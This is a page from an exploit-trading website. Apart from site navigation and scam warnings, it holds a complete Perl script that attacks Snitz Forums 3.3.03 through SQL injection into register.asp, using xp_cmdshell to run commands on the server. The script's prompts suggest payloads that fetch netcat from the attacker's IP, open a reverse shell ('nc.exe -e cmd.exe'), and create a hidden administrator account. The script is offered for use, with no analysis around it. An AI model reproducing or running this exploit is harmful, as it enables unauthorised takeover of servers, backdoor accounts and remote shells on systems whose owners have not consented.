0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Snitz Forums 3.3.03 Remote Command Execution Exploit
[====================================================
Snitz Forums 3.3.03 Remote Command Execution Exploit
====================================================
#!/usr/bin/perl
use Socket;
print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";
print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}
print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}
print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}
print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;
if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
my $data1 = $path . "\?mode\=DoIt";
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
my $length = length( $data2 );
print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";
print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";
close( FILEHANDLE );
}
sub open_TCP
{
my( $FS, $dest, $port ) = @_;
my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;
my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}
# 0day.today [2024-11-15] #